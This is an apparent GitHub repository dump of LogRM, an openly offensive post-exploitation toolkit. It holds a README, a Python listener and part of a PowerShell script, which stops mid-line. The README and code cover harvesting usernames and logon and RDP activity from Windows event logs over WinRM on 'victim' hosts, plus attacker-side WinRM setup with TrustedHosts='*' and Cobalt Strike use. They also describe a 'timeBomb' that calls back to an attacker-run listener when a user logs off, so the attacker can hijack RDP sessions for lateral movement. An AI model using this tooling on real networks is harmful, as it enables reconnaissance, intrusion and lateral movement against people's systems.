├── Python_Server.py ├── README.md ├── Screenshots ├── RDP_winrm.png ├── Use_is_LoggedOn.png ├── User_LoggedOn_RDP2.png ├── User_RDP.png ├── applocker_8004.png ├── applocker_8007.png ├── cobaltStrike_errorLogin.png ├── cobaltStrike_rdpconn.png ├── cobaltStrike_timeBomb.png ├── event4624_neo4j_query1.png ├── example1_.png ├── example2_.png ├── example3_.png ├── example3_users.png ├── runas_green.png ├── timebomb_notification.png ├── timebomb_notification2.png ├── user_is_loggedOf.png └── windows_defender.png └── logRM.ps1 /Python_Server.py: -------------------------------------------------------------------------------- 1 | #https://stackoverflow.com/questions/23828264/how-to-make-a-simple-multithreaded-socket-server-in-python-that-remembers-client 2 | import socket 3 | import threading 4 | import datetime 5 | import time 6 | from time import gmtime, strftime # NOTE(review): datetime, gmtime and strftime are imported but not used below 7 | 8 | 9 | class bcolors: # ANSI escape sequences used to colour the console notices 10 | OKGREEN = '\033[92m' 11 | BOLD = '\033[1m' 12 | ENDC = '\033[0m' # reset attributes 13 | 14 | class ThreadedServer(object): # TCP notification listener: one worker thread per accepted client; connecting peers are not authenticated 15 | def __init__(self, host, port): # host/port: address to bind; __main__ passes '' (every interface) 16 | self.host = host 17 | self.port = port 18 | self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 19 | self.sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) # allow rebinding the port right after a restart 20 | self.sock.bind((self.host, self.port)) 21 | 22 | def listen(self): # accept loop; never returns 23 | self.sock.listen(5) 24 | while True: 25 | client, address = self.sock.accept() 26 | client.settimeout(60) # an idle recv() in the worker raises after 60 s, which the bare except below turns into a close 27 | threading.Thread(target = self.listenToClient,args = (client,address)).start() 28 | 29 | def listenToClient(self, client, address): # prints one notice per received chunk; returns False once the peer disconnects or anything raises 30 | size = 1024 # recv() chunk size in bytes; a longer message is reported as several notices 31 | while True: 32 | try: 33 | data = client.recv(size) 34 | if data: 35 | # The received bytes are only printed below, never sent back. NOTE(review): nothing strips control or escape bytes, so treat them as untrusted console input (e.g. print repr(data)) 36 | response = data 37 | #timenow=datetime.datetime.now().time() 38 | currenttime = time.localtime(time.time()) # struct_time: fields 3, 4, 5 are hour, minute, second 39 | print bcolors.OKGREEN + bcolors.BOLD+"Client connected "+str(currenttime[3])+':'+str(currenttime[4])+':'+str(currenttime[5])+">"+bcolors.ENDC+" User %s from host %s in not currently inside or 
is logged of" % (response,address) # Python 2 print statement 40 | else: 41 | raise error('Client disconnected') # NOTE(review): 'error' is not defined in this file (socket.error was probably intended); the NameError is caught just below, so the socket is still closed 42 | except: # bare except: also catches the 60 s recv timeout and the NameError above 43 | client.close() 44 | return False 45 | 46 | if __name__ == "__main__": 47 | while True: 48 | port_num = input("Port? ") # NOTE(review): on Python 2 (see the print statement above) input() evaluates the typed text as an expression; raw_input() returns it unevaluated 49 | try: 50 | port_num = int(port_num) 51 | break 52 | except ValueError: 53 | pass # not a number: prompt again 54 | 55 | ThreadedServer('',port_num).listen() # '' binds every interface; blocks until the process is killed -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # LogRM 2 | LogRM is a post exploitation powershell script which it uses windows event logs to gather information about internal network in a pentration testing engagment. It is not only useful for blue teams but also for red teams because some of its functionalities can be used for lateral movement. You will be able to use LogRM not only on a localhost machine but also in a remote machine using WinRM protocol which is by default enabled in a newly Windows versions. 
3 | 4 | 5 | ## Configuration 6 | 7 | In some cases you may need to configure the WinRM protocol before it works. 8 | 9 | On the client side (attacker): 10 | 11 | winrm quickconfig 12 | winrm set winrm/config/client '@{TrustedHosts="*"}' 13 | 14 | On the server side (victim): 15 | 16 | Enable-PSRemoting -Force 17 | winrm quickconfig 18 | 19 | 20 | ## Usage 21 | 22 | You can use the following event types: 23 | 24 | 1) Information EventID (4624) - An account was successfully logged on 25 | 2) Information EventID (4625) - An account failed to log on 26 | 3) Information EventID (4728) - A member was added to a security-enabled global group 27 | 4) Information EventID (4729) - A member was removed from a security-enabled global group (*New*) 28 | 4) Information EventID (4732) - A member was added to a security-enabled local group 29 | 5) Information EventID (4733) - A member was removed from a security-enabled local group 30 | 6) Information EventID (4756) - A member was added to a security-enabled universal group (*New*) 31 | 7) Information EventID (4757) - A member was removed from a security-enabled universal group (*New*) 32 | 8) Information EventID (4738) - A user account was changed 33 | 9) Information EventID (4647) - User initiated logoff 34 | 10) Information EventID (4648) - A logon was attempted using explicit credentials (*New*) 35 | 11) Information EventID (4688) - A new process has been created 36 | 12) Information EventID (4720) - A user account was created (*New*) 37 | 13) Information EventID (4738) - A user account was changed (*New*) 38 | 14) Information EventID (4776) - The domain controller attempted to validate the credentials for an account 39 | 15) Information EventID (4634) - An account was logged off (*New*) 40 | 16) Information EventID (5136) - A directory service object was modified (*New*) 41 | 17) Information EventID (400,500,501,600) - PowerShell Logs (*New*) 42 | 18) Information EventID (8001,8002,8003) - Login using NTLM Hash (*Upcoming*) 43 | 19) 
Information EventID (8004) - Microsoft-Windows-applocker/EXE and DLL (*New*) 44 | 20) Information EventID (8007) - Microsoft-Windows-applocker/MSI and Script (*New*) 45 | 46 | 47 | 48 | ### Scenarios 49 | 50 | By default LogRM searches the newest 10 entries of every event type. 51 | 52 | ``` 53 | PS> LogRM -user -pass -ip 54 | PS> LogRM -user -pass -fips 55 | PS> LogRM -ip 127.0.0.1 56 | ``` 57 | 58 | Search a specific event ID with the -eventID parameter: 59 | ``` 60 | PS> LogRM -user -pass -ip -eventID 61 | PS> LogRM -user -pass -fips -eventID 62 | PS> LogRM -ip 127.0.0.1 -eventID 63 | ``` 64 | 65 | ![alt text](https://github.com/tasox/LogRM/blob/master/Screenshots/example1_.png) 66 | 67 | With the -newest parameter you can search a specific number of entries, which in many cases gives more accurate results. 68 | 69 | ``` 70 | PS> LogRM -user -pass -ip -newest 71 | PS> LogRM -user -pass -fips -newest 72 | PS> LogRM -ip 127.0.0.1 -newest 73 | ``` 74 | 75 | ![alt text](https://github.com/tasox/LogRM/blob/master/Screenshots/example2_.png) 76 | 77 | With the -users flag you get a list of valid usernames; LogRM extracts them from event IDs 4624, 4625 and 4776. 78 | 79 | ``` 80 | PS> LogRM -user -pass -ip -users 81 | PS> LogRM -user -pass -fips -users 82 | PS> LogRM -ip 127.0.0.1 -users 83 | ``` 84 | 85 | In earlier Windows versions, for example Windows Server 2008, you cannot have more than 5 WinRM connections to the same host. 86 | 87 | ## RunAS Functionality (New) 88 | 89 | ![alt_text](https://github.com/tasox/LogRM/blob/master/Screenshots/runas_green.png) 90 | 91 | ## Time Bomb 92 | 93 | TimeBomb is useful when you have landed on a network host and want a notification when the user logs off, so that you can use an RDP (Remote Desktop) connection. 
If the user has a Remote Desktop session to another network host and left it open after logging out, you could move through the network from that forgotten RDP connection. You can create a timer without creating or editing Windows scheduled tasks, leaving the host untouched. You have 3 options when you create a timeBomb: 94 | 95 | 1) now 96 | 2) once 97 | 3) trigger 98 | 99 | Timebomb uses the following events: 100 | 101 | 1) Information EventID (4624) - An account was successfully logged on 102 | 2) Information EventID (4647) - User initiated logoff 103 | 3) Information Event ID (4778) - A session was reconnected to a Window Station 104 | 4) Information Event ID (4779) - A session was disconnected from a Window Station 105 | 5) Information Event ID (4800) - The workstation was locked 106 | 6) Information Event ID (4801) - The workstation was unlocked 107 | 7) Information Event ID (4802) - The screen saver was invoked 108 | 8) Information Event ID (4803) - The screen saver was dismissed 109 | 110 | Tip 1: give the -newest parameter as large a number of entries as possible, for example 5000. 111 | 112 | 113 | ### Intro to Windows events 114 | 115 | Before using timeBomb we have to learn the differences between the Windows events. Events 4778/4779 are fired when a user who is currently logged in uses the switch-user button to move quickly between users without locking or logging out of the terminal. Event 4800 is fired when the user presses Windows+L on the keyboard or clicks Lock from the Start menu. On the other hand, 4801 is fired after unlocking with Ctrl+Alt+Del. Sometimes users use screensavers not only for power saving but also to lock their machines; in that case 4802/4803 take place. 116 | 117 | Information: in Windows Server 2008, events 4800/4801/4802/4803 are not created unless a policy enables them. 
118 | 119 | 120 | ### Usage 121 | 122 | 123 | The task runs immediately: 124 | ``` 125 | PS> timeBomb -task now -newest 126 | PS> timeBomb -task now -ip 127.0.0.1 -newest 127 | ``` 128 | 129 | The task runs immediately and, if the user logs off or the screen saver is invoked, you get a message: 130 | ``` 131 | PS> timeBomb -task now -newest -reverseHost -reversePort 132 | PS> timeBomb -task now -ip 127.0.0.1 -newest -reverseHost -reversePort 133 | ``` 134 | 135 | ### Discover if any user is logged on 136 | 137 | Using timeBomb you can discover whether any user is logged on, for the case where we want to connect to the host with RDP. TimeBomb correlates the events and, behind the scenes, asks the following questions: 138 | 139 | 1) Is anyone logged off? 140 | 2) Has anyone used the switch-user button? 141 | 3) Has anyone used the lock button? 142 | 4) Is anyone connected to the network host with RDP? 143 | 5) What if a screensaver has locked the host? 144 | 145 | #### Scenario 1 - User used RDP to connect to the remote host; after a while the host is locked 146 | 147 | ![alt_text](https://github.com/tasox/LogRM/blob/master/Screenshots/User_RDP.png) 148 | 149 | 150 | #### Scenario 2 - User is connected to the remote host with RDP and is currently logged in 151 | 152 | ![alt_text](https://github.com/tasox/LogRM/blob/master/Screenshots/User_LoggedOn_RDP2.png) 153 | 154 | 155 | The task runs once at a specific time: 156 | ``` 157 | PS> timeBomb -task once -at 15:00 -newest -reverseHost -reversePort 158 | PS> timeBomb -task once -at 15:00 -ip 127.0.0.1 -newest -reverseHost -reversePort 159 | ``` 160 | 161 | #### Scenario 3 - User is logged off and TimeBomb sent a notification to our remote server. 
162 | 163 | ![alt text](https://github.com/tasox/LogRM/blob/master/Screenshots/timebomb_notification2.png) 164 | ![alt_text](https://github.com/tasox/LogRM/blob/master/Screenshots/timebomb_notification.png) 165 | 166 | 167 | The task starts and stops at specific times: 168 | ``` 169 | PS> timeBomb -task trigger -at 15:00 -stoptime 16:00 -newest -reverseHost -reversePort 170 | PS> timeBomb -task trigger -at 15:00 -stoptime 16:00 -ip 127.0.0.1 -newest -reverseHost -reversePort 171 | ``` 172 | 173 | ## Active Remote Desktop Sessions 174 | 175 | The RDPConn function lists only valid incoming RDP connections to the compromised host. With it you can observe which users from which machines have a connection to our host, without interrupting their connection as we would if we tried to log in with the same credentials. 176 | 177 | The RDPConn function uses the following events: 178 | 179 | 1) Session logon succeeded - 21 180 | 2) Session has been disconnected - 24 181 | 3) Session reconnection succeeded - 25 182 | 183 | 184 | ``` 185 | PS> RDPConn 186 | PS> RDPConn -ip 127.0.0.1 187 | ``` 188 | 189 | #### Scenario 1 190 | 191 | ![alt text](https://github.com/tasox/LogRM/blob/master/Screenshots/RDP_winrm.png) 192 | 193 | 194 | 195 | ## CobaltStrike and LogRM 196 | 197 | You can import the LogRM script into Cobalt Strike and execute it with powerpick or powershell. 198 | 199 | ![alt_text](https://github.com/tasox/LogRM/blob/master/Screenshots/cobaltStrike_rdpconn.png) 200 | 201 | ![alt_text](https://github.com/tasox/LogRM/blob/master/Screenshots/cobaltStrike_timeBomb.png) 202 | 203 | ![alt_text](https://github.com/tasox/LogRM/blob/master/Screenshots/cobaltStrike_errorLogin.png) 204 | 205 | 206 | ## Applocker log files 207 | 208 | In a domain environment, after implementing a GPO that enforces an AppLocker policy, you can use events 8007 and 8004 to observe malicious actions. 
209 | 210 | ![alt_text](https://github.com/tasox/LogRM/blob/master/Screenshots/applocker_8004.png) 211 | ![alt_text](https://github.com/tasox/LogRM/blob/master/Screenshots/applocker_8007.png) 212 | 213 | ## Windows Defender history 214 | 215 | The Windows Defender function combines two built-in PowerShell functions, Get-Threat and Get-ThreatDetection, to enumerate the threat history. 216 | 217 | ![alt_text](https://github.com/tasox/LogRM/blob/master/Screenshots/windows_defender.png) 218 | 219 | ## Windows Logs with Neo4j (Upcoming ...) 220 | 221 | ![alt_text](https://github.com/tasox/LogRM/blob/master/Screenshots/event4624_neo4j_query1.png) 222 | 223 | ## Authors 224 | 225 | * TasoX (@taso_x) 226 | 227 | 228 | 229 | -------------------------------------------------------------------------------- /Screenshots/RDP_winrm.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tasox/LogRM/fc56ca0c3458eb71369f19426d18c26e2b43dcae/Screenshots/RDP_winrm.png -------------------------------------------------------------------------------- /Screenshots/Use_is_LoggedOn.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tasox/LogRM/fc56ca0c3458eb71369f19426d18c26e2b43dcae/Screenshots/Use_is_LoggedOn.png -------------------------------------------------------------------------------- /Screenshots/User_LoggedOn_RDP2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tasox/LogRM/fc56ca0c3458eb71369f19426d18c26e2b43dcae/Screenshots/User_LoggedOn_RDP2.png -------------------------------------------------------------------------------- /Screenshots/User_RDP.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tasox/LogRM/fc56ca0c3458eb71369f19426d18c26e2b43dcae/Screenshots/User_RDP.png 
-------------------------------------------------------------------------------- /Screenshots/applocker_8004.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tasox/LogRM/fc56ca0c3458eb71369f19426d18c26e2b43dcae/Screenshots/applocker_8004.png -------------------------------------------------------------------------------- /Screenshots/applocker_8007.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tasox/LogRM/fc56ca0c3458eb71369f19426d18c26e2b43dcae/Screenshots/applocker_8007.png -------------------------------------------------------------------------------- /Screenshots/cobaltStrike_errorLogin.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tasox/LogRM/fc56ca0c3458eb71369f19426d18c26e2b43dcae/Screenshots/cobaltStrike_errorLogin.png -------------------------------------------------------------------------------- /Screenshots/cobaltStrike_rdpconn.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tasox/LogRM/fc56ca0c3458eb71369f19426d18c26e2b43dcae/Screenshots/cobaltStrike_rdpconn.png -------------------------------------------------------------------------------- /Screenshots/cobaltStrike_timeBomb.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tasox/LogRM/fc56ca0c3458eb71369f19426d18c26e2b43dcae/Screenshots/cobaltStrike_timeBomb.png -------------------------------------------------------------------------------- /Screenshots/event4624_neo4j_query1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tasox/LogRM/fc56ca0c3458eb71369f19426d18c26e2b43dcae/Screenshots/event4624_neo4j_query1.png 
-------------------------------------------------------------------------------- /Screenshots/example1_.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tasox/LogRM/fc56ca0c3458eb71369f19426d18c26e2b43dcae/Screenshots/example1_.png -------------------------------------------------------------------------------- /Screenshots/example2_.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tasox/LogRM/fc56ca0c3458eb71369f19426d18c26e2b43dcae/Screenshots/example2_.png -------------------------------------------------------------------------------- /Screenshots/example3_.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tasox/LogRM/fc56ca0c3458eb71369f19426d18c26e2b43dcae/Screenshots/example3_.png -------------------------------------------------------------------------------- /Screenshots/example3_users.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tasox/LogRM/fc56ca0c3458eb71369f19426d18c26e2b43dcae/Screenshots/example3_users.png -------------------------------------------------------------------------------- /Screenshots/runas_green.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tasox/LogRM/fc56ca0c3458eb71369f19426d18c26e2b43dcae/Screenshots/runas_green.png -------------------------------------------------------------------------------- /Screenshots/timebomb_notification.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tasox/LogRM/fc56ca0c3458eb71369f19426d18c26e2b43dcae/Screenshots/timebomb_notification.png -------------------------------------------------------------------------------- /Screenshots/timebomb_notification2.png: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/tasox/LogRM/fc56ca0c3458eb71369f19426d18c26e2b43dcae/Screenshots/timebomb_notification2.png -------------------------------------------------------------------------------- /Screenshots/user_is_loggedOf.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tasox/LogRM/fc56ca0c3458eb71369f19426d18c26e2b43dcae/Screenshots/user_is_loggedOf.png -------------------------------------------------------------------------------- /Screenshots/windows_defender.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tasox/LogRM/fc56ca0c3458eb71369f19426d18c26e2b43dcae/Screenshots/windows_defender.png -------------------------------------------------------------------------------- /logRM.ps1: -------------------------------------------------------------------------------- 1 | function LogRM { 2 | 3 | <# 4 | 5 | .Description 6 | 7 | LogRM is a post exploitation powershell script which uses windows event logs to gather information about the internal network in a penetration testing engagement. 8 | It is not only useful for blue teams but also for red teams because some of its functionalities can be used for lateral movement. You will be able to use LogRM not only on a localhost machine but 9 | also on a remote machine using the WinRM protocol, which is enabled by default in newer Windows versions. 
10 | 11 | 12 | .Configuration 13 | 14 | Enable WinRM on the client side (attacker): 15 | 16 | winrm quickconfig 17 | winrm set winrm/config/client '@{TrustedHosts="*"}' (this trusts every remote host; narrow it to the target addresses where possible) 18 | 19 | On the server side (victim): 20 | 21 | Enable-PSRemoting -Force 22 | winrm quickconfig 23 | 24 | .Examples 25 | 26 | PS> LogRM -user -pass -ip -eventID 27 | PS> LogRM -user -pass -fips -eventID 28 | PS> LogRM -ip 127.0.0.1 -eventID 29 | 30 | PS> timeBomb -task now -newest 31 | PS> timeBomb -task now -ip 127.0.0.1 -newest 32 | 33 | 34 | for more examples: https://github.com/tasox/LogRM/blob/master/README.md 35 | 36 | 37 | #> 38 | 39 | [CmdletBinding()] 40 | Param([string]$domain,[string]$user,[string]$pass,[string]$ip,[switch]$remove,[string]$newest,[int]$eventID,[switch]$users,[string]$fips,[switch]$scheduler,[string]$task,[datetime]$at,[int]$loop,[datetime]$stoptime) # NOTE(review): $pass is a plain [string]; it is only wrapped in a SecureString below, so it stays in clear text in memory and in the shell history when given on the command line 41 | 42 | 43 | 44 | if($ip -match '127.0.0.1') # local mode; -match is a regex, so the dots match any character 45 | { 46 | 47 | 48 | if($eventID -eq "") # [int]$eventID is 0 when omitted; NOTE(review): this relies on "" converting to 0 in the comparison, i.e. "no -eventID given" 49 | { 50 | $events=(4624,4625,4634,4647,4648,4728,4729,4732,4733,4738,4756,4757,4776,4688,5136,400,600,500,501) # IDs queried when no -eventID is given 51 | 52 | #query all event id's and print the results 53 | for($counter=0;$counter -lt $events.length;$counter++) 54 | { 55 | $eventID=$events[$counter] 56 | start-Job -ScriptBlock ${function:logQuery} -ArgumentList $eventID,$newest | Out-Null 57 | Get-Job | Wait-Job | Receive-Job # waits for every job before the next ID, so the IDs are processed one after another 58 | } 59 | 60 | 61 | } 62 | else 63 | { 64 | 65 | start-Job -ScriptBlock ${function:logQuery} -ArgumentList $eventID,$newest | Out-Null 66 | Write-Output "`n" 67 | Write-Output "`n" 68 | Get-Job | Wait-Job | Receive-Job 69 | } 70 | 71 | #Delete all jobs 72 | Get-Job | Remove-Job 73 | 74 | } 75 | else 76 | { 77 | try 78 | { 79 | 80 | 81 | $mycreds=New-Object System.Management.Automation.PSCredential("$domain\$user",(ConvertTo-SecureString $pass -AsPlainText -Force)) # plaintext -> SecureString; -Force acknowledges that the text arrived unprotected 82 | if($fips) 83 | { 84 | #Read file with IPs 85 | [array]$fileIPs=(Get-Content $fips | ? 
{$_.trim() -ne "" }) 86 | 87 | for($count_ips=0;$count_ips -le $fileIPs.Length;$count_ips++) # NOTE(review): -le runs one step past the last element, so the final iteration passes $null to testConnectivity 88 | { 89 | 90 | 91 | try 92 | { 93 | #$session=New-PSSession -ComputerName $fileIPs[$count_ips] -Credential $mycreds -ErrorAction Stop 94 | if((testConnectivity $fileIPs[$count_ips] 5985)) # testConnectivity is not visible here, presumably defined later in the script; 5985 is the WinRM HTTP port 95 | { 96 | $session=New-PSSession -ComputerName $fileIPs[$count_ips] -Credential $mycreds -ErrorAction Stop # a failure throws into the catch below 97 | if($session) 98 | { 99 | Write-Host "Successfully connected with "$fileIPs[$count_ips] -ForegroundColor Green 100 | Write-Output "`n" 101 | } 102 | else 103 | { 104 | Write-Warning "Username or Password is wrong!" 105 | } 106 | } 107 | else 108 | { 109 | Write-Host "Port 5985 is closed ->"$fileIPs[$count_ips] -ForegroundColor Red 110 | } 111 | } 112 | catch 113 | { 114 | <# Nothing Here #> # NOTE(review): connection errors for this IP (bad credentials, timeout) are dropped without any message 115 | } 116 | 117 | } 118 | } 119 | else 120 | { 121 | 122 | #check if port 5985 is open before try to connect with the host 123 | if((testConnectivity $ip 5985)) 124 | { 125 | 126 | if((Get-PSSession).ComputerName -eq $ip) # array -eq scalar yields the matching entries, so this is true when a session to $ip already exists 127 | { 128 | Write-Host "[!] 
You have already open connection with the host $ip" -ForegroundColor Yellow 129 | } 130 | else 131 | { 132 | $session=New-PSSession -ComputerName $ip -Credential $mycreds -ErrorAction Stop # a failure unwinds to the outer catch, which prints the credential warnings 133 | if($session) 134 | { 135 | 136 | Write-Host "Successful connection with $ip" -ForegroundColor Green 137 | Write-Output "`n" 138 | 139 | } 140 | 141 | } 142 | 143 | 144 | } 145 | else 146 | { 147 | Write-Host "Port 5985 is closed -> $ip" -ForegroundColor Red 148 | Write-Output "`n" 149 | } 150 | 151 | 152 | } 153 | 154 | try 155 | { 156 | #Print Active Sessions 157 | Write-Output "[+] WinRM Connections" 158 | 159 | if(Get-PSSession) 160 | { 161 | 162 | Get-PSSession 163 | Write-Output "`n" 164 | Get-PSSession | Group-Object -Property ComputerName 165 | Write-Output "`n" 166 | 167 | #[string]$WinrmId=Read-Host -Prompt "Give a session's id to retrieve logs (By default all)" 168 | Write-Output "`n" 169 | 170 | 171 | if($WinrmId -or !$WinrmId) # always true; $WinrmId is never assigned (the Read-Host above is commented out), so every session is queried 172 | { 173 | 174 | 175 | 176 | if($eventID -eq 4625){$eventID=4625}elseif($eventID -eq 4624){$eventID=4624}elseif($eventID -eq 4634){$eventID=4634}elseif($eventID -eq 4647){$eventID=4647}elseif($eventID -eq 4648){$eventID=4648}elseif($eventID -eq 4732){$eventID=4732}elseif($eventID -eq 4733){$eventID=4733}elseif($eventID -eq 4738){$eventID=4738}elseif($eventID -eq 4776){$eventID=4776}elseif($eventID -eq 4688){$eventID=4688}elseif($eventID -eq 4728){$eventID=4728}elseif($eventID -eq 4729){$eventID=4729}elseif($eventID -eq 4756){$eventID=4756}elseif($eventID -eq 4757){$eventID=4757}elseif($eventID -eq 5136){$eventID=5136}elseif($eventID -eq 400){$eventID=400}elseif($eventID -eq 600){$eventID=600}elseif($eventID -eq 500){$eventID=500}elseif($eventID -eq 501){$eventID=501}else{$eventID} # NOTE(review): each branch assigns $eventID the value it already has, so this chain is a no-op 177 | if(!$newest){$newest=10}else{$newest=$newest} # default entry count 178 | 179 | Write-Output "`n" 180 | 181 | 182 | #Split session ids, add them to an array 183 | if([string]$WinrmId -match ',') 184 | { 185 | $WinrmSIDArray=$WinrmId -split ',' 186 | 187 | } 188 | 
elseif($WinrmId -match ' ') 189 | { 190 | $WinrmSIDArray=$WinrmId -split ' ' 191 | } 192 | elseif($WinrmId.Length -ne 0) 193 | { 194 | [array]$WinrmSIDArray=$WinrmId 195 | 196 | } 197 | 198 | #if user press enter which means all sessions 199 | else 200 | { 201 | 202 | [array]$WinrmSIDArray=Get-PSSession | %{$_.Id} 203 | } 204 | 205 | 206 | #check if user enter valid sessionID 207 | #Null sessionID = ALL Sessions 208 | 209 | for($SessCounter=0;$SessCounter -lt $WinrmSIDArray.Length;$SessCounter++) 210 | { #1 211 | 212 | if((Get-PSSession).Id -contains $WinrmSIDArray[$SessCounter] -or ($WinrmSIDArray -eq "")) 213 | { #1 214 | 215 | 216 | 217 | try #1 218 | { 219 | 220 | 221 | 222 | Write-Host (Get-PSSession -Id $WinrmSIDArray[$SessCounter] | select -Property id,Name,ComputerName) -ForegroundColor Green 223 | 224 | Invoke-Command -Session ( Get-PSSession -Id $WinrmSIDArray[$SessCounter]) -ArgumentList($users) -ScriptBlock ${function:logQuery} # -ArgumentList passes $users, but the visible branches of logQuery read $using:eventID and $using:newest instead 225 | 226 | 227 | 228 | }# End of Try #1 229 | 230 | catch #1 231 | { 232 | <# Nothing Here #> # NOTE(review): a remote failure (access denied, log not readable) is silently skipped for this session 233 | 234 | }#close try/catch #1 235 | 236 | 237 | 238 | }# if/else #1 239 | else 240 | { 241 | Write-Host "[-] The session ID" $WinrmSIDArray[$SessCounter] "does not exist!" -ForegroundColor Red 242 | }#if statement checks for valid sessionID 243 | }# End For #1 244 | 245 | }#close if($winrmid) 246 | 247 | 248 | } 249 | else 250 | { 251 | Write-Host "[-] No active sessions " -ForegroundColor Green 252 | 253 | } 254 | 255 | } 256 | catch 257 | { 258 | Write-Output "Error!!!!" # the error record itself is discarded; printing $_ would say what failed 259 | } 260 | 261 | } 262 | catch # reached when anything in the try above threw, typically New-PSSession 263 | { 264 | if(!$remove) 265 | { 266 | if((Get-PSSession | Group-Object -Property ComputerName).Count -lt 5) 267 | { 268 | Write-Warning "[-] Please check again the Username or the Password." 269 | Write-Warning "[-] Maybe the specified credentials rejected by the server because of privileges." 
270 | } 271 | else 272 | { 273 | $t=(Get-PSSession | Group-Object -Property ComputerName).Name 274 | Write-Warning "[-] More than 5 connections in $t" 275 | Write-Warning "[-] Use> WinRMLog -remove" # NOTE(review): this function is named LogRM; 'WinRMLog' looks like a stale name 276 | 277 | } 278 | } 279 | } 280 | 281 | 282 | 283 | 284 | if($remove) 285 | { 286 | if(Get-PSSession) 287 | { 288 | Get-PSSession 289 | $WinrmSessionIdDelete=Read-Host -Prompt "[-] Input winRM id Session to Delete" 290 | 291 | if($WinrmSessionIdDelete -ne "" -and $WinrmSessionIdDelete) 292 | { 293 | Remove-PSSession -id $WinrmSessionIdDelete # NOTE(review): the Read-Host text goes straight to -Id; a non-existent numeric id only raises a non-terminating error, so the success message below still prints 294 | Write-Host "[+] You successfully remove Sessions $WinrmSessionIdDelete" -ForegroundColor Green 295 | } 296 | else 297 | { 298 | Remove-PSSession -id (Get-PSSession | %{$_.Id}) # an empty answer removes every session 299 | } 300 | } 301 | else 302 | { 303 | Write-Host "[-] Session table is null!" -ForegroundColor Yellow 304 | } 305 | 306 | 307 | 308 | } 309 | 310 | } 311 | 312 | } 313 | 314 | 315 | function logQuery($eventID,$newest) 316 | { 317 | 318 | 319 | #Param($eventID,$newest) 320 | 321 | if($using:eventID -eq 4624) 322 | { 323 | 324 | Write-Host "[+] " -ForegroundColor Green -Nonewline; Write-Output "Information EventID (4624) - An account was successfully logged on" 325 | 326 | Get-EventLog -Newest $using:newest -LogName Security -Instanceid 4624 | Where {$_.message -notmatch "Account Name:\s*\w+\$"} | Select -Property TimeGenerated,MachineName,@{Name="Username";Expression={$_.ReplacementStrings[5]}},@{Name="SourceIP";Expression={$_.ReplacementStrings[18]}},@{Name="SourcePort";Expression={$_.ReplacementStrings[19]}} 327 | 328 | } 329 | elseif($using:eventID -eq 4625) 330 | { 331 | Write-Host "[+] " -ForegroundColor Green -Nonewline; Write-Output "Information EventID (4625) - An account failed to log on" 332 | Get-EventLog -Newest $using:newest -LogName Security -Instanceid 4625 | Where {$_.message -notmatch "Account Name:\s*\w+\$"} | Select -Property 
TimeGenerated,MachineName,@{Name="Username";Expression={$_.ReplacementStrings[5]}},@{Name="SourceIP";Expression={$_.ReplacementStrings[19]}},@{Name="SourcePort";Expression={$_.ReplacementStrings[20]}} 333 | 334 | } 335 | elseif($using:eventID -eq 4634) 336 | { 337 | Write-Host "[+] " -ForegroundColor Green -Nonewline; Write-Output "Information EventID (4634) - An account was logged off" 338 | Get-EventLog -Newest $using:newest -LogName Security -Instanceid 4634 | Where {$_.message -notmatch "Account Name:\s*\w+\$"} | Select -Property TimeGenerated,MachineName,@{Name="Username";Expression={$_.ReplacementStrings[1]}},@{Name="Security ID";Expression={$_.ReplacementStrings[0]}} 339 | 340 | } 341 | elseif($using:eventID -eq 4720) 342 | { 343 | Write-Host "[+] " -ForegroundColor Green -Nonewline; Write-Output "Information EventID (4720) - A user account was created" 344 | #Get-EventLog -Newest $newest -LogName Security -Instanceid 4720 | Where {$_.message -notmatch "Account Name:\s*\w+\$"} | Select -Property TimeGenerated,MachineName,@{Name="Created Account Name";Expression={$_.ReplacementStrings[0]}},@{Name="Created Account Domain";Expression={$_.ReplacementStrings[1]}},@{Name="Created Account SID";Expression={$_.ReplacementStrings[2]}},@{Name="Account SID Performed Changes";Expression={$_.ReplacementStrings[3]}},@{Name="Account Name Performed Changes";Expression={$_.ReplacementStrings[4]}},@{Name="Account Domain Performed Changes";Expression={$_.ReplacementStrings[5]}},@{Name="Account Logon ID Performed Changes";Expression={$_.ReplacementStrings[6]}},@{Name="SAM Account Name";Expression={$_.ReplacementStrings[8]}},@{Name="Display Name";Expression={$_.ReplacementStrings[9]}},@{Name="User Principal Name";Expression={$_.ReplacementStrings[10]}},@{Name="Primary Group ID";Expression={$_.ReplacementStrings[18]}} 345 | Get-EventLog -Newest $using:newest -LogName Security -Instanceid 4720 | Select -Property TimeGenerated,MachineName,@{Name="Created Account 
